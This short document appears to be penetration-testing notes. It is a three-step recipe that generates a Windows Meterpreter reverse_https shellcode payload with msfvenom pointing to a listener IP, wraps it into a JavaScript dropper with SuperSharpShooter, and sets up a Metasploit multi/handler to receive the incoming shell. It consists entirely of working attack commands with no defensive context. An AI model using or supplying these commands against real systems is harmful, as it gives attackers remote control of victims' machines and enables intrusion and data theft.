-
First prepare a shell.txt using msfvenom:
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.45.195 LPORT=3333 -f raw -o /home/kali/shell.txt -
Then use SuperSharpShooter:
python3 SuperSharpShooter.py --payload js --dotnetver 4 --stageless --rawscfile /home/kali/shell.txt --output test -
To receive the incoming shell:
msfconsole -q
use multi/handler
set payload windows/x64/meterpreter/reverse_https
set lhost IP
set lport PORT
exploit